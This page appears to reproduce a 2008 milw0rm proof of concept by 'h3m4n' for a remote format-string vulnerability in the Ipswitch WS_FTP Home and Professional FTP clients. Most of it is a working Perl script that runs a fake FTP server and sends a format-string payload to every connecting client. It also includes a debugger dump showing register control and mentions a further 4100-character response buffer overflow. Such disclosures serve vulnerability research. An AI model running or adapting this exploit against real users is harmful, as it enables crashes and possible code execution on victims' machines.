WS_FTP HomeProfessional FTP Client Remote Format String PoC by h3m4n

VIEWS: 36 PAGES: 1

									                        WS_FTP HomeProfessional FTP Client Remote Format String PoC                               Page 1/1
   1   ##################################################################################################################
   2   #
   3   # Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability
   4   # Vendor : http://www.ipswitch.com/
   5   # Affected Os : Windows *
   6   # Risk : critical
   7   #
   8   # This bug is pretty interresting in the way you have to exploit it in a weird way...
   9   #
  10   # With this PoC you’ll get a full control over EAX/ECX
  11   # (
  12   # eax=41414141 ebx=0000000a ecx=41414141 edx=00000000 esi=41414142 edi=02b1f0ab
  13   # eip=77d3ef68 esp=02b1f01c ebp=02b1f064 iopl=0         nv up ei pl nz na po nc
  14   # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000                  efl=00010206
  15   # USER32!CharLowerA+0x93:
  16   # 77d3ef68 8a10             mov     dl,[eax]                ds:0023:41414141=??
  17   # )
  18   # Fake Server PoC :
  19   use strict;
  20   use Socket;
  21
  22   my $port = shift || 21;
  23   my $proto = getprotobyname(’tcp’);
  24   my $goodz = "\x41\x41\x41\x41\x41\x41\x41\x41%x%x%x%x%x%x%x%s";
  25
  26   my $visitor;
  27   socket(SOCKET, PF_INET, SOCK_STREAM, $proto)
  28   or die "To bad $!\n";
  29   setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1);
  30   bind(SOCKET, pack( "S n a4 x8", AF_INET, $port, "\0\0\0\0" ))
  31   or die "Shitz port $port is allready in use, shut down your ftp server !\n";
  32   listen(SOCKET, 5) or die "Listen: $!";
  33   print "Fake Server started on port $port\n";
  34   while ($visitor = accept(NEW_SOCKET, SOCKET)) {
  35   print NEW_SOCKET $goodz;
  36   close NEW_SOCKET;
  37   }
  38
  39   # Anyways, in the WS_FTP Home client there’s still a buffer overflow in the FTP server message response ( 4100 chars
       answer −−> done ).
  40
  41   # milw0rm.com [2008−08−17]




securfrog                                                                                                          08/17/2008

								
To top